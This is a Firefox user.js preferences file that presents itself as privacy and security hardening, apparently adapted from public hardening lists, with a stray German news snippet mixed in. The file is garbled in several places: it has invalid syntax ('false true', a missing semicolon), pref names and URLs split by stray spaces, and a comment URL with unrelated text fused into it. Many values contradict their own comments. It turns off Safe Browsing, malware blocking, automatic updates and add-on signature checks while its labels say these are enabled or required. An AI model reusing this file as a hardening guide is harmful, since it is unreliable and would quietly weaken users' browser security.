user_pref("view_source.tab", false); // 3015: disable tab animation, speed things up a little user_pref("browser.tabs.animate", false); // 3016: disable fullscreeen animation. Test using F11. // Animation is smother but is annoyingly slow, while no animation can be startling user_pref("browser.fullscreen.animate", false); // 3018: maximum number of daily bookmark backups to keep (default is 15) user_pref("browser.bookmarks.max_backups", 2); // 3020: FYI: urlbar click behaviour (with defaults) user_pref("browser.urlbar.clickSelectsAll", false); user_pref("browser.urlbar.doubleClickSelectsAll", true); // 3022: hide recently bookmarked items (you still have the original bookmarks) (FF49+) user_pref("browser.bookmarks.showRecentlyBookmarked", false); // 3023: disable automigrate, current default is false but may change (FF49+) // need more info, but lock down for now user_pref("browser.migrate.automigrate.enabled", false) // 2615: (43+) disable http2 for now as well // user_pref("network.http.spdy.enabled.http2draft", false); // One more (detailed) listing: https://www.ghacks.net/2015/08/18/a-comprehensive- list-of-firefox-privacy-and-security-settings/ user_pref("app.update.staging.enabled", false); user_pref("privacy.trackingprotection.enabled", true); user_pref("privacy.trackingprotection.pbmode.enabled", true); user_pref("browser.send_pings", false); user_pref("browser.send_pings.require_same_host", true); user_pref("browser.sessionstore.max_tabs_undo", 0); user_pref("browser.sessionstore.max_windows_undo", 0); user_pref("security.ssl.treat_unsafe_negotiation_as_broken", true); user_pref("security.pki.sha1_enforcement_level", 1); user_pref("security.mixed_content.send_hsts_priming", false); user_pref("network.http.spdy.enabled", false); user_pref("network.http.spdy.enabled.deps", false); // 2615: disable http2 for now as well user_pref("network.http.spdy.enabled.http2", false); user_pref("network.proxy.socks_remote_dns", true); // 2666: disable HTTP Alternative Services // https://www.ghacks.net/2015/08/18/ a-comprehensive-list-of-firefox-privacy-and- security-settings/#comment-3970881 user_pref("network.http.altsvc.enabled", false); user_pref("network.http.altsvc.oe", false); user_pref("devtools.chrome.enabled", false); // // https://support.mozilla.org/en-US/questions/1043508 user_pref("dom.disable_beforeunload", true); // //****************************************************************************** //* SECTION: Extensions / plugins * //******************************************************************************/ // PREF: Ensure you have a security delay when installing add-ons (milliseconds) // http://kb.mozillazine.org/Disable_extension_install_delay_-_Firefox // http://www.squarefree.com/2004/07/01/race-conditions-in-security-dialogs/ user_pref("security.dialog_enable_delay", 1000); // PREF: Require signatures // https://wiki.mozilla.org/Addons/Extension_Signing; needed for extensions like FireGloves etc. user_pref("xpinstall.signatures.required", false); // PREF: Opt-out of add-on metadata updates // https://blog.mozilla.org/addons/how-to-opt-out-of-add-on-metadata-updates/ user_pref("extensions.getAddons.cache.enabled", false); // PREF: Opt-out of themes (Persona) updates // https://support.mozilla.org/t5/Firefox/how-do-I-prevent-autoamtic-updates-in-a-50-user-environment/td-p/144287 user_pref("lightweightThemes.update.enabled", false); // PREF: Disable Flash Player NPAPI plugin // http://kb.mozillazine.org/Flash_plugin user_pref("plugin.state.flash", 0); // PREF: Disable Java NPAPI plugin user_pref("plugin.state.java", 0); // PREF: Disable sending Flash Player crash reports user_pref("dom.ipc.plugins.flash.subprocess.crashreporter.enabled", false); // PREF: When Flash crash reports are enabled, don´t send the visited URL in the crash report user_pref("dom.ipc.plugins.reportCrashURL", false); // PREF: When Flash is enabled, download and use Mozilla SWF URIs blocklist // https://bugzilla.mozilla.org/show_bug.cgi?id=1237198 // https://github.com/mozilla-services/shavar-plugin-blocklist user_pref("browser.safebrowsing.blockedURIs.enabled", true); // PREF: Disable Shumway (Mozilla Flash renderer) // https://developer.mozilla.org/en-US/docs/Mozilla/Projects/Shumway user_pref("shumway.disabled", true); // PREF: Disable Gnome Shell Integration NPAPI plugin user_pref("plugin.state.libgnome-shell-browser-plugin", 0); // PREF: Disable the bundled OpenH264 video codec (disabled) // http://forums.mozillazine.org/viewtopic.php? p=13845077&sid=28af2622e8bd8497 b9113851676846b1#p13845077 user_pref("media.gmp-provider.enabled", false); // PREF: Enable plugins click-to-play // https://wiki.mozilla.org/Firefox/Click_To_Play // https://blog.mozilla.org/security/2012/10/11/click-to-play-plugins-blocklist-style/ user_pref("plugins.click_to_play", false); // PREF: Updates addons automatically // https://blog.mozilla.org/addons/how-to-turn-off-add-on-updates/ user_pref("extensions.update.enabled", false); // PREF: Enable add-on and certificate blocklists (OneCRL) from Mozilla // https://wiki.mozilla.org/Blocklisting // https://blocked.cdn.mozilla.net/ // http://kb.mozillazine.org/Extensions.blocklist.enabled // http://kb.mozillazine.org/Extensions.blocklist.url // https://blog.mozilla.org/security/2015/03/03/revoking-intermediate-certificates-introducing-onecrl/ // Updated at interval defined in extensions.blocklist.interval (default: 86400) user_pref("extensions.blocklist.enabled", true); user_pref("services.blocklist.update_enabled", true); // PREF: Decrease system information leakage to Mozilla blocklist update servers // https://trac.torproject.org/projects/tor/ticket/16931 user_pref("extensions.blocklist.url", "https://blocklist.addons.mozilla.org/ blocklist/3/%APP_ID%/ %APP_VERSION%/"); /********************************** * SECTION: Firefox (anti-)features / components * * **********************************/ // PREF: Disable WebIDE // https://trac.torproject.org/projects/tor/ticket/16222 // https://developer.mozilla.org/docs/Tools/WebIDE user_pref("devtools.webide.enabled", false); user_pref("devtools.webide. autoinstallADBHelper", false); user_pref("devtools.webide. autoinstallFxdtAdapters", false); // PREF: Disable remote debugging // https://developer.mozilla.org/en-US/ docs/Tools/Remote_Debugging/Debugging_Firefox_Desktop // https://developer.mozilla.org/en-US/docs/Tools/Tools_Toolbox#Advanced_settings user_pref("devtools.debugger. remote-enabled", false); user_pref("devtools.chrome.enabled", false); user_pref("devtools.debugger.force-local", true); // PREF: Disable Mozilla telemetry/experiments // https://wiki.mozilla.org/Platform/Features/Telemetry // https://wiki.mozilla.org/Privacy/Reviews/Telemetry // https://wiki.mozilla.org/Telemetry // https://www.mozilla.org/en-US/ legal/privacy/firefox.html#telemetry // https://support.mozilla.org/t5/ Firefox-crashes/Mozilla-Crash-Reporter/ta-p/1715 // https://wiki.mozilla.org/Security/ Reviews/Firefox6/ReviewNotes/telemetry // https://gecko.readthedocs.io/en/latest/ browser/experiments/experiments/manifest.html // https://wiki.mozilla.org/Telemetry/Experiments user_pref("toolkit.telemetry.enabled", false); user_pref("toolkit.telemetry.unified", false); user_pref("experiments.supported", false); user_pref("experiments.enabled", false); user_pref("experiments.manifest.uri", ""); // PREF: Disallow Necko to do A/B testing // https://trac.torproject.org/projects/tor/ticket/13170 user_pref("network.allow-experiments", false); // PREF: Disable sending Firefox crash reports to Mozilla servers // https://wiki.mozilla.org/Breakpad // http://kb.mozillazine.org/Breakpad // https://dxr.mozilla.org/mozilla-central/source/toolkit/crashreporter // https://bugzilla.mozilla.org/show_bug.cgi?id=411490 // A list of submitted crash reports can be found at about:crashes user_pref("breakpad.reportURL", ""); // PREF: Disable sending reports of tab crashes to Mozilla (about:tabcrashed), don´t nag user about unsent crash reports // https://hg.mozilla.org/mozilla-central/file/tip/ browser/app/profile/firefox.js user_pref("browser.tabs. crashReporting.sendReport", false); user_pref("browser.crashReports. unsubmittedCheck.enabled", false); // PREF: Disable FlyWeb (discovery of LAN/proximity IoT devices that expose a Web interface) // https://wiki.mozilla.org/FlyWeb // https://wiki.mozilla.org/FlyWeb/Security_scenarios // https://docs.google.com/document/d/ 1eqLb6cGjDL9XooSYEEo7mE- zKQ-o-AuDTcEyNhfBMBM/edit // http://www.ghacks.net/2016/07/26/firefox-flyweb user_pref("dom.flyweb.enabled", false); // PREF: Disable the UITour backend // https://trac.torproject.org/projects/tor/ticket/19047#comment:3 user_pref("browser.uitour.enabled", false); // PREF: Enable Firefox Tracking Protection // https://wiki.mozilla.org/Security/Tracking_protection // https://support.mozilla.org/en-US/kb/tracking-protection-firefox // https://support.mozilla.org/en-US/kb/tracking-protection-pbm // https://kontaxis.github.io/trackingprotectionfirefox/ // https://feeding.cloud.geek.nz/posts/how-tracking-protection-works-in-firefox/ user_pref("privacy.trackingprotection.enabled", true); user_pref("privacy.trackingprotection.pbmode.enabled", true); // PREF: Enable contextual identity Containers feature (Firefox>= 52) // NOTICE: Containers are not available in Private Browsing mode // https://wiki.mozilla.org/Security/Contextual_Identity_Project/Containers user_pref("privacy.userContext.enabled", true); // PREF: Enable hardening against various fingerprinting vectors (Tor Uplift project) // https://wiki.mozilla.org/Security/Tor_Uplift/Tracking // https://bugzilla.mozilla.org/show_bug.cgi?id=1333933 user_pref("privacy.resistFingerprinting", true); // PREF: Disable the built-in PDF viewer // https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2743 // https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/ // https://www.mozilla.org/en-US/security/advisories/mfsa2015-69/ user_pref("pdfjs.disabled", true); // PREF: Disable collection/sending of the health report (healthreport.sqlite*) // https://support.mozilla.org/en-US/kb/ firefox-health-report-understand-your-browser-perf // https://gecko.readthedocs.org/en/latest/ toolkit/components/telemetry/telemetry/preferences.html user_pref("datareporting.healthreport.uploadEnabled", false); user_pref("datareporting.healthreport.service.enabled", false); user_pref("datareporting.policy.dataSubmissionEnabled", false); // PREF: Disable Heartbeat (Mozilla user rating telemetry) // https://wiki.mozilla.org/Advocacy/heartbeat // https://trac.torproject.org/projects/tor/ticket/19047 user_pref("browser.selfsupport.url", ""); // PREF: Disable Firefox Hello (disabled) (Firefox< 49) // https://wiki.mozilla.org/Loop // https://support.mozilla.org/t5/Chat-and-share/ Support-for-Hello-discontinued-in-Firefox-49/ta-p/37946 // NOTICE-DISABLED: Firefox Hello requires setting ´media.peerconnection.enabled´ and ´media.getusermedia.screensharing.enabled´ to true, ´security.OCSP.require´ to false to work. user_pref("loop.enabled", false); // PREF: Disable Firefox Hello metrics collection // https://groups.google.com/d/topic/mozilla.dev.platform/nyVkCx-_sFw/discussion user_pref("loop.logDomains", false); // PREF: Enable Auto Update (disabled) // NOTICE: Fully automatic updates are disabled and left to package management systems on Linux. Windows users may want to change this setting. // CIS 2.1.1 user_pref("app.update.auto", false); // PREF: Enforce checking for Firefox updates // http://kb.mozillazine.org/App.update.enabled // NOTICE: Update check page might incorrectly report Firefox ESR as out-of-date user_pref("app.update.enabled", false); // PREF: Enable blocking reported web forgeries // https://wiki.mozilla.org/Security/Safe_Browsing // http://kb.mozillazine.org/Safe_browsing // https://support.mozilla.org/en-US/kb/how-does-phishing-and-malware-protection-work // http://forums.mozillazine.org/viewtopic.php?f=39& t=2711237&p=12896849#p12896849 // CIS 2.3.4 user_pref("browser.safebrowsing.enabled", false); // Firefox< 50 user_pref("browser.safebrowsing.phishing.enabled", false); // firefox>= 50 // PREF: Enable blocking reported attack sites // http://kb.mozillazine.org/Browser.safebrowsing.malware.enabled // CIS 2.3.5 user_pref("browser.safebrowsing.malware.enabled", false); // PREF: Disable querying Google Application Reputation database for downloaded binary files // https://www.mozilla.org/en-US/firefox/39.0/releasenotes/ // https://wiki.mozilla.org/Security/Application_Reputation user_pref("browser.safebrowsing.downloads.remote.enabled", false); // PREF: Disable Pocket // https://support.mozilla.org/en-US/kb/save-web-pages-later-pocket-firefox // https://github.com/pyllyukko/user.js/issues/143 user_pref("browser.pocket.enabled", false); user_pref("extensions.pocket.enabled", false); // PREF: Disable SHIELD // https://support.mozilla.org/en-US/kb/shield // https://bugzilla.mozilla.org/show_bug.cgi?id=1370801 user_pref("extensions.shield-recipe-client.enabled", false); user_pref("app.shield.optoutstudies.enabled", false); // PREF: Disable "Recommended by Pocket" in Firefox Quantum user_pref("browser.newtabpage.activity-stream.feeds.section.topstories", false); /****************************************************************************** * SECTION: Automatic connections * ******************************************************************************/ // PREF: Disable prefetching of<link rel="next"> URLs // http://kb.mozillazine.org/Network.prefetch-next // https://developer.mozilla.org/en-US/docs/ Web/HTTP/Link_prefetching_FAQ #Is_there_a_preference_to_disable_link_prefetching.3F user_pref("network.prefetch-next", false); // PREF: Disable DNS prefetching // http://kb.mozillazine.org/Network.dns.disablePrefetch // https://developer.mozilla.org/en-US/docs/ Web/HTTP/Controlling_DNS_prefetching user_pref("network.dns.disablePrefetch", false); user_pref("network.dns. disablePrefetchFromHTTPS", false); // PREF: Disable the predictive service (Necko) // https://wiki.mozilla.org/Privacy/Reviews/Necko user_pref("network.predictor.enabled", false); // PREF: Reject .onion hostnames before passing the to DNS // https://bugzilla.mozilla.org/show_bug.cgi?id=1228457 // RFC 7686 user_pref("network.dns.blockDotOnion", true); // PREF: Disable search suggestions in the search bar // http://kb.mozillazine.org/Browser.search.suggest.enabled user_pref("browser.search.suggest.enabled", false); // PREF: Disable "Show search suggestions in location bar results" user_pref("browser.urlbar.suggest. searches", false); // PREF: When using the location bar, don´t suggest URLs from browsing history user_pref("browser.urlbar.suggest.history", false); // PREF: Disable SSDP // https://bugzilla.mozilla.org/show_bug.cgi?id=1111967 user_pref("browser.casting.enabled", false); // PREF: Disable automatic downloading of OpenH264 codec // https://support.mozilla.org/en-US/ kb/how-stop-firefox-making-automatic-connections# w_media-capabilities // https://andreasgal.com/2014/10/14/openh264-now-in-firefox/ user_pref("media.gmp-gmpopenh264.enabled", false); user_pref("media.gmp-manager.url", ""); // PREF: Disable speculative pre-connections // https://support.mozilla.org/en-US/kb/ how-stop-firefox-making-automatic- connections#w_speculative-pre-connections // https://bugzilla.mozilla.org/show_bug.cgi?id=814169 user_pref("network.http.speculative-parallel-limit", 0); // PREF: Disable downloading homepage snippets/messages from Mozilla // https://support.mozilla.org/en-US/kb/ how-stop-firefox-making-automatic-connections #w_mozilla-content // https://wiki.mozilla.org/Firefox/Projects/ Firefox_Start/Snippet_Service user_pref("browser.aboutHomeSnippets. updateUrl", ""); // PREF: Never check updates for search engines // https://support.mozilla.org/en-US/kb/ how-stop-firefox-making-automatic-connections# w_auto-update-checking user_pref("browser.search.update", false); // PREF: Disable automatic captive portal detection (Firefox>= 52.0) // https://support.mozilla.org/en-US/questions/1157121 user_pref("network.captive-portal- service.enabled", false); /*********************** * SECTION: HTTP * ************************/ // PREF: Disallow NTLMv1 // https://bugzilla.mozilla.org/show_bug.cgi?id=828183 user_pref("network.negotiate-auth. allow-insecure-ntlm-v1", false); // it is still allowed through HTTPS. uncomment the following to disable it completely. //user_pref("network.negotiate-auth.allow-insecure-ntlm-v1-https", false); // PREF: Enable CSP 1.1 script-nonce directive support // https://bugzilla.mozilla.org/show_bug.cgi?id=855326 user_pref("security.csp. experimentalEnabled", true); // PREF: Enable Content Security Policy (CSP) // https://developer.mozilla.org/en-US/ docs/Web/Security/CSP/Introducing_ Content_Security_Policy // https://developer.mozilla.org/en-US/ docs/Web/HTTP/CSP user_pref("security.csp.enable", true); // PREF: Enable Subresource Integrity // https://developer.mozilla.org/en-US/docs/ Web/Security/Subresource_Integrity // https://wiki.mozilla.org/Security/ Subresource_Integrity user_pref("security.sri.enable", true); // PREF: DNT HTTP header (disabled) // https://www.mozilla.org/en-US/firefox/dnt/ // https://en.wikipedia.org/wiki/Do_not_track_header // https://dnt-dashboard.mozilla.org // https://github.com/pyllyukko/user.js/issues/11 // NOTICE: Do No Track must be enabled manually user_pref("privacy.donottrackheader. enabled", true); // PREF: Send a referer header with the target URI as the source // https://bugzilla.mozilla.org/show_bug.cgi?id=822869 // https://github.com/pyllyukko/user.js/issues/227 // NOTICE: Spoofing referers breaks functionality on websites relying on authentic referer headers // NOTICE: Spoofing referers breaks visualisation of 3rd-party sites on the Lightbeam addon // NOTICE: Spoofing referers disables CSRF protection on some login pages not implementing origin-header/cookie+token based CSRF protection // TODO: https://github.com/pyllyukko/user.js/issues/94, commented-out XOriginPolicy/XOriginTrimmingPolicy = 2 prefs user_pref("network.http.referer. spoofSource",false true); // PREF: Don´t send referer headers when following links across different domains (disabled) // https://github.com/pyllyukko/user.js/issues/227 user_pref("network.http.referer.XOriginPolicy", 2); // PREF: Accept Only 1st Party Cookies // http://kb.mozillazine.org/Network.cookie.cookieBehavior#1 // NOTICE: Blocking 3rd-party cookies breaks a number of payment gateways // CIS 2.5.1 // set 1: cookies from third parties only, 2: no cookies (2 recommended, if extension cookie-controller is installed) user_pref("network.cookie.cookieBehavior", 2); // PREF: Make sure that third-party cookies (if enabled) never persist beyond the session. // https://feeding.cloud.geek.nz/posts/tweaking-cookies-for-privacy-in-firefox/ // http://kb.mozillazine.org/Network.cookie.thirdparty.sessionOnly // https://developer.mozilla.org/en-US/docs/ Cookies_Preferences_in_Mozilla #network.cookie.thirdparty.sessionOnly // user_pref("network.cookie.thirdparty.sessionOnly", false); // PREF: Spoof User-agent (disabled) user_pref("general.useragent.override", "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0"); user_pref("general.appname.override", "Netscape"); user_pref("general.appversion. override", "5.0 (Windows)"); user_pref("general.platform.override", "Win64"); user_pref("general.oscpu.override", "Windows NT 6.1"); /************************* * SECTION: Caching * **************************/ // PREF: Permanently enable private browsing mode // https://support.mozilla.org/en-US/kb/Private-Browsing // https://wiki.mozilla.org/PrivateBrowsing // NOTICE: You can not view or inspect cookies when in private browsing: https://bugzilla.mozilla.org/show_bug.cgi?id=823941 // NOTICE: When Javascript is enabled, Websites can detect use of Private Browsing mode // NOTICE: Private browsing breaks Kerberos authentication // NOTICE: Disables "Containers" functionality (see below) // NOTICE: "Always use private browsing mode" (browser.privatebrowsing.autostart) disables the possibility to use password manager: https://support.mozilla.org/en-US/kb/usernames-and-passwords-are-not-saved#w_private-browsing user_pref("browser.privatebrowsing.autostart", true); // PREF: Do not download URLs for the offline cache // http://kb.mozillazine.org/Browser.cache.offline.enable user_pref("browser.cache.offline.enable", false); // PREF: Clear history when Firefox closes // https://support.mozilla.org/en-US/kb/ Clear%20Recent%20 History#w_how-do-i-make-firefox-clear-my-history-automatically // NOTICE: Installing user.js will remove your browsing history, caches and local storage. // NOTICE: Installing user.js **will remove your saved passwords** (https://github.com/pyllyukko/user.js/issues/27) // NOTICE: Clearing open windows on Firefox exit causes 2 windows to open when Firefox starts https://bugzilla.mozilla.org/show_bug.cgi?id=1334945 user_pref("privacy.sanitize.sanitizeOnShutdown", true); user_pref("privacy.clearOnShutdown.cache", true); user_pref("privacy.clearOnShutdown.cookies", true); user_pref("privacy.clearOnShutdown.downloads", true); user_pref("privacy.clearOnShutdown.formdata", true); user_pref("privacy.clearOnShutdown.history", true); user_pref("privacy.clearOnShutdown.offlineApps", true); user_pref("privacy.clearOnShutdown.sessions", true); user_pref("privacy.clearOnShutdown.openWindows", false); // must be set to false, in order to prevent from two loading window instances on startup // PREF: Set time range to "Everything" as default in "Clear Recent History" user_pref("privacy.sanitize.timeSpan", 0); // PREF: Clear everything but "Site Preferences" in "Clear Recent History" user_pref("privacy.cpd.offlineApps", true); user_pref("privacy.cpd.cache", true); user_pref("privacy.cpd.cookies", true); user_pref("privacy.cpd.downloads", true); user_pref("privacy.cpd.formdata", true); user_pref("privacy.cpd.history", true); user_pref("privacy.cpd.passwords", true); user_pref("privacy.cpd.sessions", true); // PREF: Don´t remember browsing history user_pref("places.history.enabled", false); // PREF: Disable disk cache // http://kb.mozillazine.org/Browser.cache.disk.enable user_pref("browser.cache.disk.enable", false); // PREF: Disable memory cache (disabled) // http://kb.mozillazine.org/Browser.cache.memory.enable user_pref("browser.cache.memory.enable", false); // PREF: Disable Caching of SSL Pages // CIS Version 1.2.0 October 21st, 2011 2.5.8 // http://kb.mozillazine.org/Browser.cache.disk_cache_ssl user_pref("browser.cache.disk_cache_ssl", false); // PREF: Disable download history // CIS Version 1.2.0 October 21st, 2011 2.5.5 user_pref("browser.download.manager.retention", 0); // PREF: Disable password manager // CIS Version 1.2.0 October 21st, 2011 2.5.2 user_pref("signon.rememberSignons", false); // PREF: Disable form autofill, don´t save information entered in web page forms and the Search Bar user_pref("browser.formfill.enable", false); // PREF: Cookies expires at the end of the session (when the browser closes) // http://kb.mozillazine.org/Network.cookie.lifetimePolicy#2 user_pref("network.cookie.lifetimePolicy", 2); // PREF: Require manual intervention to autofill known username/passwords sign-in forms // http://kb.mozillazine.org/Signon.autofillForms // https://www.torproject.org/projects/torbrowser/design/#identifier-linkability user_pref("signon.autofillForms", false); // PREF: Disable formless login capture // https://bugzilla.mozilla.org/show_bug.cgi?id=1166947 user_pref("signon.formlessCapture.enabled", false); // PREF: When username/password autofill is enabled, still disable it on non-HTTPS sites // https://hg.mozilla.org/integration/mozilla-inbound/rev/f0d146fe7317 user_pref("signon.autofillForms.http", false); // PREF: Show in-content login form warning UI for insecure login fields // https://hg.mozilla.org/integration/mozilla-inbound/rev/f0d146fe7317 user_pref("security.insecure_field_warning.contextual.enabled", true); // PREF: Disable the password manager for pages with autocomplete=off (disabled) // https://bugzilla.mozilla.org/show_bug.cgi?id=956906 // OWASP ASVS V9.1 // Does not prevent any kind of auto-completion (see browser.formfill.enable, signon.autofillForms) user_pref("signon.storeWhenAutocompleteOff", false); // PREF: Delete Search and Form History // CIS Version 1.2.0 October 21st, 2011 2.5.6 user_pref("browser.formfill.expire_days", 0); // PREF: Clear SSL Form Session Data // http://kb.mozillazine.org/Browser.sessionstore.privacy_level#2 // Store extra session data for unencrypted (non-HTTPS) sites only. // CIS Version 1.2.0 October 21st, 2011 2.5.7 // NOTE: CIS says 1, we use 2 user_pref("browser.sessionstore.privacy_level", 2); // PREF: Delete temporary files on exit // https://bugzilla.mozilla.org/show_bug.cgi?id=238789 user_pref("browser.helperApps.deleteTempFileOnExit", true); // PREF: Do not create screenshots of visited pages (relates to the "new tab page" feature) // https://support.mozilla.org/en-US/questions/973320 // https://developer.mozilla.org/en-US/docs/Mozilla/ Preferences/Preference_reference/ browser.pagethumbnails.capturing_disabled user_pref("browser.pagethumbnails.capturing_disabled", true); // PREF: Don´t fetch and permanently store favicons for Windows .URL shortcuts created by drag and drop // NOTICE: .URL shortcut files will be created with a generic icon // Favicons are stored as .ico files in $profile_dirshortcutCache user_pref("browser.shell.shortcutFavicons", false); // PREF: Disable bookmarks backups (default: 15) // http://kb.mozillazine.org/Browser.bookmarks.max_backups user_pref("browser.bookmarks.max_backups", 0); /******************************************************************************* * SECTION: UI related * *******************************************************************************/ // PREF: Enable insecure password warnings (login forms in non-HTTPS pages) // https://blog.mozilla.org/tanvi/2016/01/28/ no-more-passwords-over-http-please/ // https://bugzilla.mozilla.org/show_bug.cgi?id=1319119 // https://bugzilla.mozilla.org/show_bug.cgi?id=1217156 user_pref("security.insecure_password.ui.enabled", true); // PREF: Disable right-click menu manipulation via JavaScript (disabled) user_pref("dom.event.contextmenu.enabled", false); // PREF: Disable "Are you sure you want to leave this page?" popups on page close // https://support.mozilla.org/en-US/questions/1043508 // Does not prevent JS leaks of the page close event. // https://developer.mozilla.org/en-US/docs/Web/Events/beforeunload user_pref("dom.disable_beforeunload", true); // PREF: Disable Downloading on Desktop // CIS 2.3.2 user_pref("browser.download.folderList", 2); // PREF: Always ask the user where to download // https://developer.mozilla.org/en/ Download_Manager_preferences (obsolete) user_pref("browser.download.useDownloadDir", false); // PREF: Disable the "new tab page" feature and show a blank tab instead // https://wiki.mozilla.org/Privacy/Reviews/New_Tab // https://support.mozilla.org/en-US/kb/ new-tab-page-show-hide-and- customize-top-sites#w_how-do-i-turn-the-new-tab-page-off user_pref("browser.newtabpage.enabled", false); user_pref("browser.newtab.url", "about:blank"); // PREF: Disable Activity Stream // https://wiki.mozilla.org/Firefox/Activity_Stream user_pref("browser.newtabpage.activity-stream.enabled", false); // PREF: Disable new tab tile ads &preload // http://www.thewindowsclub.com/disable-remove-ad-tiles-from-firefox // http://forums.mozillazine.org/viewtopic.php?p=13876331#p13876331 // https://wiki.mozilla.org/Tiles/Technical_Documentation#Ping // https://gecko.readthedocs.org/en/latest/browser/browser/ DirectoryLinksProvider.html# browser-newtabpage-directory-source // https://gecko.readthedocs.org/en/latest/browser/browser/ DirectoryLinksProvider.html# browser-newtabpage-directory-ping // TODO: deprecated? not in DXR, some dead links user_pref("browser.newtabpage.enhanced", false); user_pref("browser.newtab.preload", false); user_pref("browser.newtabpage.directory.ping", ""); user_pref("browser.newtabpage.directory.source", "data:text/plain,{}"); // PREF: Enable Auto Notification of Outdated Plugins (Firefox< 50) // https://wiki.mozilla.org/Firefox3.6/Plugin_Update_Awareness_Security_Review // CIS Version 1.2.0 October 21st, 2011 2.1.2 // https://hg.mozilla.org/mozilla-central/rev/304560 user_pref("plugins.update.notifyUser", false); // PREF: Force Punycode for Internationalized Domain Names // http://kb.mozillazine.org/Network.IDN_show_punycode // https://www.xudongz.com/blog/2017/idn-phishing/ // https://wiki.mozilla.org/IDN_Display_Algorithm // https://en.wikipedia.org/wiki/IDN_homograph_attack // https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/ // CIS Mozilla Firefox 24 ESR v1.0.0 - 3.6 user_pref("network.IDN_show_punycode", true); // PREF: Disable inline autocomplete in URL bar // http://kb.mozillazine.org/Inline_autocomplete user_pref("browser.urlbar.autoFill", false); user_pref("browser.urlbar.autoFill.typed", false); // PREF: Disable CSS :visited selectors // https://blog.mozilla.org/security/2010/03/31/plugging-the-css-history-leak/ // https://dbaron.org/mozilla/visited-privacy user_pref("layout.css.visited_links_enabled", false); // PREF: Disable URL bar autocomplete and history/bookmarks suggestions dropdown // http://kb.mozillazine.org/Disabling_autocomplete_-_Firefox#Firefox_3.5 user_pref("browser.urlbar.autocomplete.enabled", false); // PREF: Do not check if Firefox is the default browser user_pref("browser.shell.checkDefaultBrowser", false); // PREF: When password manager is enabled, lock the password storage periodically // CIS Version 1.2.0 October 21st, 2011 2.5.3 Disable Prompting for Credential Storage user_pref("security.ask_for_password", 2); // PREF: Lock the password storage every 1 minutes (default: 30) user_pref("security.password_lifetime", 1); // PREF: Display a notification bar when websites offer data for offline use // http://kb.mozillazine.org/Browser.offline-apps.notify user_pref("browser.offline-apps.notify", true); /****************************************************************************** * SECTION: Cryptography * ******************************************************************************/ // PREF: Enable HSTS preload list (pre-set HSTS sites list provided by Mozilla) // https://blog.mozilla.org/security/2012/11/01/preloading-hsts/ // https://wiki.mozilla.org/Privacy/Features/HSTS_Preload_List // https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security user_pref("network.stricttransportsecurity.preloadlist", true); // PREF: Enable Online Certificate Status Protocol // https://en.wikipedia.org/wiki/Online_Certificate_Status_Protocol // https://www.imperialviolet.org/2014/04/19/revchecking.html // https://www.maikel.pro/blog/current-state-certificate-revocation-crls-ocsp/ // https://wiki.mozilla.org/CA:RevocationPlan // https://wiki.mozilla.org/CA:ImprovingRevocation // https://wiki.mozilla.org/CA:OCSP-HardFail // https://news.netcraft.com/archives/2014/04/24/certificate-revocation-why-browsers-remain-affected-by-heartbleed.html // https://news.netcraft.com/archives/2013/04/16/certificate-revocation-and-the-performance-of-ocsp.html // NOTICE: OCSP leaks your IP and domains you visit to the CA when OCSP Stapling is not available on visited host // NOTICE: OCSP is vulnerable to replay attacks when nonce is not configured on the OCSP responder // NOTICE: OCSP adds latency (performance) // NOTICE: Short-lived certificates are not checked for revocation (security.pki.cert_short_lifetime_in_days, default:10) // CIS Version 1.2.0 October 21st, 2011 2.2.4 user_pref("security.OCSP.enabled", true); // PREF: Enable OCSP Stapling support // https://en.wikipedia.org/wiki/OCSP_staplingtoolkit. telemetry.cachedClientID // https://blog.mozilla.org/security/2013/07/29/ocsp-stapling-in-firefox/ // https://www.digitalocean.com/community/tutorials/ how-to-configure-ocsp-stapling-on-apache-and-nginx user_pref("security.ssl.enable_ocsp_stapling", true); // PREF: Enable OCSP Must-Staple support (Firefox>= 45) // https://blog.mozilla.org/security/2015/11/23/ improving-revocation-ocsp-must-staple-and-short-lived-certificates/ // https://www.entrust.com/ocsp-must-staple/ // https://github.com/schomery/privacy-settings/issues/40 // NOTICE: Firefox falls back on plain OCSP when must-staple is not configured on the host certificate user_pref("security.ssl.enable_ocsp_must_staple", false); // PREF: Require a valid OCSP response for OCSP enabled certificates // https://groups.google.com/forum/#!topic/ mozilla.dev.security/n1G-N2-HTVA // Disabling this will make OCSP bypassable by MitM attacks suppressing OCSP responses // NOTICE: ´security.OCSP.require´ will make the connection fail when the OCSP responder is unavailable // NOTICE: ´security.OCSP.require´ is known to break browsing on some [captive portals](https://en.wikipedia.org/wiki/Captive_portal) user_pref("security.OCSP.require", false); // // PREF: Disable TLS Session Tickets // https://www.blackhat.com/us-13/briefings.html#NextGen // https://media.blackhat.com/us-13/US-13-Daigniere-TLS-Secrets-Slides.pdf // https://media.blackhat.com/us-13/US-13-Daigniere-TLS-Secrets-WP.pdf // https://bugzilla.mozilla.org/show_bug.cgi?id=917049 // https://bugzilla.mozilla.org/show_bug.cgi?id=967977 user_pref("security.ssl.disable_session_identifiers", false); // // Software::Browser // Firefox 74 schaltet TLS 1.0 und 1.1 ab // Firefox 74 setzt die bereits 2018 beschlossene Abschaltung von TLS 1.0 und 1.1 in die Tat um und ergreift Maßnahmen gegen WebRTC-Leaking. // https://www.pro-linux.de/news/1/27860/firefox-74-schaltet-tls-10-und-11-ab.html // PREF: Only allow TLS 1.[0-3] // http://kb.mozillazine.org/Security.tls.version.* // 1 = TLS 1.0 is the minimum required / maximum supported encryption protocol. (This is the current default for the maximum supported version.) // 2 = TLS 1.1 is the minimum required / maximum supported encryption protocol. user_pref("security.tls.version.min", 3); user_pref("security.tls.version.max", 4); // user_pref("security.tls.version.enable-deprecated", false); // PREF: Disable insecure TLS version fallback // https://bugzilla.mozilla.org/show_bug.cgi?id=1084025 // https://github.com/pyllyukko/user.js/ pull/206#issuecomment-280229645 user_pref("security.tls.version.fallback-limit", 3); // PREF: Enfore Public Key Pinning // https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning // https://wiki.mozilla.org/SecurityEngineering/ Public_Key_Pinning // "2. Strict. Pinning is always enforced." user_pref("security.cert_pinning. enforcement_level", 2); // PREF: Disallow SHA-1 // https://bugzilla.mozilla.org/show_bug.cgi?id=1302140 // https://shattered.io/ 